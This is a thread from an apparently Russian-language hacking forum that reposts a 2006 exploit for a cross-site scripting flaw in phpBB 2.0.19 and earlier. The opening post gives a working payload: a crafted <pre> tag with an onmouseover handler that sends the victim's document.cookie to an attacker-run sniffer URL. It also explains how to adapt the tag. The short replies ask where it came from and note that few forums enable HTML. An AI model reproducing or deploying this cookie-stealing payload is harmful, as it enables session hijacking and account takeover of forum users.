phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

Discussion in 'Уязвимости' started by Rebz, 30 Jan 2006.

  1. Rebz

    Rebz Super Moderator
    Staff Member

    Joined:
    8 Nov 2004
    Messages:
    4,054
    Likes Received:
    1,527
    Reputations:
    1,126
    /*
    As long as html is ON in the latest version of phpBB forums,
    several XSS attack vectors are possible. phpBB incorrectly
    filters in both messages and profiles, making cookie stealing,
    and other XSS attacks possible. the exploit leads to arbitary
    javascript execution, which in turn can lead to html defacement.

    use of the <pre> tag means that the cursor must pass it in the y
    direction only. e.g. the mouse only needs to cross a point
    horrizontaly equal to the link in order for the javascript to be executed.

    the following is a simple attack:
    */

    Code:
    <pre a='>' onmouseover='document.location="http://адрес_сниффера/сниффер.php?c="+document.cookie' b='<pre' >
    
    [url_]http://www.somesite.com/[/url_]</pre>
    * в теге [url_] убираем знак подчеркивания "_".

    # milw0rm.com [2006-01-29]
     
    5 people like this.
  2. MERTXX

    MERTXX New Member

    Joined:
    5 Feb 2006
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
  3. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    934
    Likes Received:
    394
    Reputations:
    261
    Прикольно а сам нашёл ии где то взял?
     
    1 person likes this.
  4. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,097
    Likes Received:
    672
    Reputations:
    591
    мда =)
     
    1 person likes this.
  5. Gang100

    Gang100 Banned

    Joined:
    18 Feb 2006
    Messages:
    32
    Likes Received:
    24
    Reputations:
    21
    уязвимость работает только с включеным Html на форуме, а таких форумов единицы =(
     
Loading...